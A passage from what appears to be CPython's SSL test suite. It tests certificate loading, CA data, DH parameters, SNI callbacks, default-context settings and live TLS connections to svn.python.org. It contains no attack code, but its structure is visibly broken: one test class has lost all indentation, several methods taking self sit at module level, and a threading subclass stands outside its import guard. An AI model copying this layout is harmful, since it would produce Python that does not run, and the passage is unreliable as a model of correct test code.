                return KEY_PASSWORD
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=GetPassCallable().getpass)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
        with self.assertRaisesRegex(TypeError, "must return a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
        with self.assertRaisesRegex(Exception, "getpass error"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
        # Make sure the password function isn't called if it isn't needed
        ctx.load_cert_chain(CERTFILE, password=getpass_exception)
    def test_load_verify_locations(self):
        """load_verify_locations accepts str/bytes cafile and capath arguments."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
        with self.assertRaises(OSError) as cm:
            ctx.load_verify_locations(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)

        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
    def test_load_verify_cadata(self):
        """cadata loading works for PEM and DER, deduplicates, rejects junk."""
        # test cadata
        with open(CAFILE_CACERT) as f:
            cacert_pem = f.read()
        cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
        with open(CAFILE_NEURONIO) as f:
            neuronio_pem = f.read()
        neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)

        # test PEM
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
        ctx.load_verify_locations(cadata=cacert_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = "\n".join((cacert_pem, neuronio_pem))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # with junk around the certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = ["head", cacert_pem, "other", neuronio_pem, "again",
                    neuronio_pem, "tail"]
        ctx.load_verify_locations(cadata="\n".join(combined))
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # test DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(cadata=cacert_der)
        ctx.load_verify_locations(cadata=neuronio_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=cacert_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = b"".join((cacert_der, neuronio_der))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # error cases
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)

        with self.assertRaisesRegex(ssl.SSLError, "no start line"):
            ctx.load_verify_locations(cadata="broken")
        with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
            ctx.load_verify_locations(cadata=b"broken")
    def test_load_dh_params(self):
        """load_dh_params accepts DH parameter files, rejects non-DH input."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_dh_params(DHFILE)
        if os.name != 'nt':
            ctx.load_dh_params(BYTES_DHFILE)
        self.assertRaises(TypeError, ctx.load_dh_params)
        self.assertRaises(TypeError, ctx.load_dh_params, None)
        with self.assertRaises(FileNotFoundError) as cm:
            ctx.load_dh_params(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)
    @skip_if_broken_ubuntu_ssl
    def test_session_stats(self):
        """A fresh context reports all-zero session statistics."""
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.session_stats(), {
                'number': 0,
                'connect': 0,
                'connect_good': 0,
                'connect_renegotiate': 0,
                'accept': 0,
                'accept_good': 0,
                'accept_renegotiate': 0,
                'hits': 0,
                'misses': 0,
                'timeouts': 0,
                'cache_full': 0,
            })
    def test_set_default_verify_paths(self):
        """set_default_verify_paths must at least not raise."""
        # There's not much we can do to test that it acts as expected,
        # so just check it doesn't crash or raise an exception.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()
    @unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
    def test_set_ecdh_curve(self):
        """set_ecdh_curve accepts known curve names (str/bytes), rejects others."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ecdh_curve("prime256v1")
        ctx.set_ecdh_curve(b"prime256v1")
        self.assertRaises(TypeError, ctx.set_ecdh_curve)
        self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
        self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
        self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
    @needs_sni
    def test_sni_callback(self):
        """set_servername_callback accepts a callable or None, nothing else."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

        # set_servername_callback expects a callable, or None
        self.assertRaises(TypeError, ctx.set_servername_callback)
        self.assertRaises(TypeError, ctx.set_servername_callback, 4)
        self.assertRaises(TypeError, ctx.set_servername_callback, "")
        self.assertRaises(TypeError, ctx.set_servername_callback, ctx)

        def dummycallback(sock, servername, ctx):
            pass
        ctx.set_servername_callback(None)
        ctx.set_servername_callback(dummycallback)
    @needs_sni
    def test_sni_callback_refcycle(self):
        """A context referenced by its own SNI callback is still collectable."""
        # Reference cycles through the servername callback are detected
        # and cleared.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        def dummycallback(sock, servername, ctx, cycle=ctx):
            pass
        ctx.set_servername_callback(dummycallback)
        wr = weakref.ref(ctx)
        del ctx, dummycallback
        gc.collect()
        self.assertIs(wr(), None)
    def test_cert_store_stats(self):
        """cert_store_stats counts only verify-location certs, not cert chains."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_cert_chain(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 1})
        ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 1, 'crl': 0, 'x509': 2})
    def test_get_ca_certs(self):
        """get_ca_certs returns only CA certs, decoded or as binary DER."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.get_ca_certs(), [])
        # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.get_ca_certs(), [])
        # but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
        ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
        self.assertEqual(ctx.get_ca_certs(),
            [{'issuer': ((('organizationName', 'Root CA'),),
                         (('organizationalUnitName', 'http://www.cacert.org'),),
                         (('commonName', 'CA Cert Signing Authority'),),
                         (('emailAddress', 'support@cacert.org'),)),
              'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
              'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
              'serialNumber': '00',
              'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
              'subject': ((('organizationName', 'Root CA'),),
                          (('organizationalUnitName', 'http://www.cacert.org'),),
                          (('commonName', 'CA Cert Signing Authority'),),
                          (('emailAddress', 'support@cacert.org'),)),
              'version': 3}])

        with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
            pem = f.read()
        der = ssl.PEM_cert_to_DER_cert(pem)
        self.assertEqual(ctx.get_ca_certs(True), [der])
    def test_load_default_certs(self):
        """load_default_certs accepts Purpose enums and rejects other arguments."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
        ctx.load_default_certs()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_default_certs, None)
        self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
    @unittest.skipIf(sys.platform == "win32", "not-Windows specific")
    def test_load_default_certs_env(self):
        """On POSIX, load_default_certs honors the SSL_CERT_* env vars."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_load_default_certs_env_windows(self):
        """On Windows, SSL_CERT_FILE adds to the system store's cert count."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()
        stats = ctx.cert_store_stats()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            stats["x509"] += 1
            self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
    """create_default_context() returns a TLS context with secure
    defaults for both client (SERVER_AUTH) and server (CLIENT_AUTH)
    purposes, and accepts all three CA-loading channels."""
    def check_common_options(ctx):
        # SSLv2 must always be disabled; compression is disabled when
        # the underlying OpenSSL exposes the option at all.
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )

    # Client-side defaults: verification and hostname checking are on.
    ctx = ssl.create_default_context()
    self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    self.assertTrue(ctx.check_hostname)
    check_common_options(ctx)

    # cafile, capath and cadata may all be supplied at once.
    with open(SIGNING_CA) as f:
        cadata = f.read()
    ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
                                     cadata=cadata)
    self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    check_common_options(ctx)

    # Server-side defaults: no client-cert requirement, fresh (EC)DH
    # keys for each session when the options exist.
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    check_common_options(ctx)
    self.assertEqual(
        ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
        getattr(ssl, "OP_SINGLE_DH_USE", 0),
    )
    self.assertEqual(
        ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
        getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
    )
def test__create_stdlib_context(self):
    """_create_stdlib_context() keeps the lax pre-PEP-476 defaults:
    no certificate verification and no hostname checking, unless the
    caller explicitly asks for more."""
    def check(ctx, protocol, verify_mode):
        # Every stdlib context must at minimum disable SSLv2.
        self.assertEqual(ctx.protocol, protocol)
        self.assertEqual(ctx.verify_mode, verify_mode)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

    # Plain defaults.
    ctx = ssl._create_stdlib_context()
    self.assertFalse(ctx.check_hostname)
    check(ctx, ssl.PROTOCOL_SSLv23, ssl.CERT_NONE)

    # An explicit protocol is honoured.
    check(ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1),
          ssl.PROTOCOL_TLSv1, ssl.CERT_NONE)

    # Stricter verification settings pass straight through.
    ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
                                     cert_reqs=ssl.CERT_REQUIRED,
                                     check_hostname=True)
    self.assertTrue(ctx.check_hostname)
    check(ctx, ssl.PROTOCOL_TLSv1, ssl.CERT_REQUIRED)

    # The purpose keyword does not change the lax defaults.
    check(ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH),
          ssl.PROTOCOL_SSLv23, ssl.CERT_NONE)
def test_check_hostname(self):
    """check_hostname can only be enabled alongside certificate
    verification, and verification cannot be dropped while hostname
    checking is still on."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    self.assertFalse(ctx.check_hostname)

    # Enabling it without CERT_REQUIRED/CERT_OPTIONAL must fail.
    with self.assertRaises(ValueError):
        ctx.check_hostname = True

    # Allowed with CERT_REQUIRED...
    ctx.verify_mode = ssl.CERT_REQUIRED
    self.assertFalse(ctx.check_hostname)
    ctx.check_hostname = True
    self.assertTrue(ctx.check_hostname)

    # ...and with CERT_OPTIONAL.
    ctx.verify_mode = ssl.CERT_OPTIONAL
    ctx.check_hostname = True
    self.assertTrue(ctx.check_hostname)

    # Cannot drop back to CERT_NONE while hostname checking is active;
    # disable the check first, then it would be legal again.
    with self.assertRaises(ValueError):
        ctx.verify_mode = ssl.CERT_NONE
    ctx.check_hostname = False
    self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
    """Tests that talk to real hosts on the public network (mostly
    svn.python.org).  Every test body is wrapped in
    support.transient_internet() so that network outages surface as
    skips rather than failures."""

    def test_connect(self):
        # Handshake with no verification, then check that CERT_REQUIRED
        # fails without CA certs and succeeds once the root cert is given.
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            try:
                s.connect(("svn.python.org", 443))
                # With CERT_NONE, getpeercert() returns an empty dict.
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()

            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()

            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                s.connect(("svn.python.org", 443))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex(('svn.python.org', 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLWantReadError:
                        select.select([s], [], [], 5.0)
                    except ssl.SSLWantWriteError:
                        select.select([], [s], [], 5.0)
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                # Absurdly small timeout so the connect cannot complete.
                s.settimeout(0.0000001)
                rc = s.connect_ex(('svn.python.org', 443))
                if rc == 0:
                    self.skipTest("svn.python.org responded too quickly")
                self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
            finally:
                s.close()

    def test_connect_ex_error(self):
        # Connecting to a closed port must report the refusal via the
        # return code, not an exception.
        with support.transient_internet("svn.python.org"):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
            try:
                rc = s.connect_ex(("svn.python.org", 444))
                # Issue #19919: Windows machines or VMs hosted on Windows
                # machines sometimes return EWOULDBLOCK.
                self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
            finally:
                s.close()

    def test_connect_with_context(self):
        with support.transient_internet("svn.python.org"):
            # Same as test_connect, but with a separately created context
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # Same with a server hostname
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="svn.python.org")
            s.connect(("svn.python.org", 443))
            s.close()
            # This should fail because we have no verification certs
            ctx.verify_mode = ssl.CERT_REQUIRED
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                                   s.connect, ("svn.python.org", 443))
            s.close()
            # This should succeed because we specify the root cert
            ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        with support.transient_internet("svn.python.org"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

            # Same with a bytes `capath` argument
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=BYTES_CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_cadata(self):
        # load_verify_locations(cadata=...) must accept both PEM text
        # and DER bytes of the same root certificate.
        with open(CAFILE_CACERT) as f:
            pem = f.read()
        der = ssl.PEM_cert_to_DER_cert(pem)
        with support.transient_internet("svn.python.org"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=pem)
            with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
                s.connect(("svn.python.org", 443))
                cert = s.getpeercert()
                self.assertTrue(cert)

            # same with DER
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=der)
            with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
                s.connect(("svn.python.org", 443))
                cert = s.getpeercert()
                self.assertTrue(cert)

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with support.transient_internet("svn.python.org"):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect(("svn.python.org", 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        # Drive a full handshake by hand on a non-blocking socket,
        # retrying on SSLWantRead/WriteError until it completes.
        with support.transient_internet("svn.python.org"):
            s = socket.socket(socket.AF_INET)
            s.connect(("svn.python.org", 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            count = 0
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLWantReadError:
                    select.select([s], [], [])
                except ssl.SSLWantWriteError:
                    select.select([], [s], [])
            s.close()
            if support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        # ssl.get_server_certificate() must return a PEM cert, fail to
        # validate against an unrelated CA, and succeed against the
        # host's own root cert.
        def _test_get_server_certificate(host, port, cert=None):
            with support.transient_internet(host):
                pem = ssl.get_server_certificate((host, port),
                                                 ssl.PROTOCOL_SSLv23)
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))

                try:
                    pem = ssl.get_server_certificate((host, port),
                                                     ssl.PROTOCOL_SSLv23,
                                                     ca_certs=CERTFILE)
                except ssl.SSLError as x:
                    #should fail
                    if support.verbose:
                        sys.stdout.write("%s\n" % x)
                else:
                    self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))

                pem = ssl.get_server_certificate((host, port),
                                                 ssl.PROTOCOL_SSLv23,
                                                 ca_certs=cert)
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))
                if support.verbose:
                    sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))

        _test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
        if support.IPV6_ENABLED:
            _test_get_server_certificate('ipv6.google.com', 443)

    def test_ciphers(self):
        # Valid cipher strings connect; a nonsense string must raise.
        remote = ("svn.python.org", 443)
        with support.transient_internet(remote[0]):
            with ssl.wrap_socket(socket.socket(socket.AF_INET),
                                 cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
                s.connect(remote)
            with ssl.wrap_socket(socket.socket(socket.AF_INET),
                                 cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
                s.connect(remote)
            # Error checking can happen at instantiation or when connecting
            with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
                with socket.socket(socket.AF_INET) as sock:
                    s = ssl.wrap_socket(sock,
                                        cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                    s.connect(remote)

    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
        # SHA256 was added in OpenSSL 0.9.8
        if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
            self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
        # sha256.tbs-internet.com needs SNI to use the correct certificate
        if not ssl.HAS_SNI:
            self.skipTest("SNI needed for this test")
        # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
        remote = ("sha256.tbs-internet.com", 443)
        sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
        with support.transient_internet("sha256.tbs-internet.com"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(sha256_cert)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="sha256.tbs-internet.com")
            try:
                s.connect(remote)
                if support.verbose:
                    sys.stdout.write("\nCipher with %r is %r\n" %
                                     (remote, s.cipher()))
                    sys.stdout.write("Certificate is:\n%s\n" %
                                     pprint.pformat(s.getpeercert()))
            finally:
                s.close()

    def test_get_ca_certs_capath(self):
        # capath certs are loaded on request
        with support.transient_internet("svn.python.org"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            # Nothing loaded yet...
            self.assertEqual(ctx.get_ca_certs(), [])
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect(("svn.python.org", 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # ...but the handshake pulled in the CA cert.
            self.assertEqual(len(ctx.get_ca_certs()), 1)

    @needs_sni
    def test_context_setget(self):
        # Check that the context of a connected socket can be replaced.
        with support.transient_internet("svn.python.org"):
            ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = socket.socket(socket.AF_INET)
            with ctx1.wrap_socket(s) as ss:
                ss.connect(("svn.python.org", 443))
                self.assertIs(ss.context, ctx1)
                self.assertIs(ss._sslobj.context, ctx1)
                ss.context = ctx2
                self.assertIs(ss.context, ctx2)
                self.assertIs(ss._sslobj.context, ctx2)
# Thread support can be missing from minimal builds; record its
# availability so the threaded server tests below can be skipped wholesale.
try:
    import threading
except ImportError:
    _have_threads = False
else:
    _have_threads = True
    # The HTTPS test-server helper requires threading as well.
    from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
    """TLS-capable echo server running in a background thread.

    Handles one connection at a time and echoes back the lower-cased
    payload.  Understands a tiny command protocol: b'over' closes the
    connection, b'STARTTLS'/b'ENDTLS' switch TLS on and off (when
    *starttls_server* is enabled), and b'CB tls-unique' returns the
    channel-binding data.  Usable as a context manager.
    """

    class ConnectionHandler(threading.Thread):

        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock, addr):
            self.server = server
            self.running = False
            self.sock = connsock
            self.addr = addr
            self.sock.setblocking(1)
            # self.sslconn is the TLS wrapper when active, else None.
            self.sslconn = None
            threading.Thread.__init__(self)
            self.daemon = True

        def wrap_conn(self):
            # Upgrade self.sock to TLS.  On failure, record the error,
            # stop the whole server and return False.
            try:
                self.sslconn = self.server.context.wrap_socket(
                    self.sock, server_side=True)
                self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
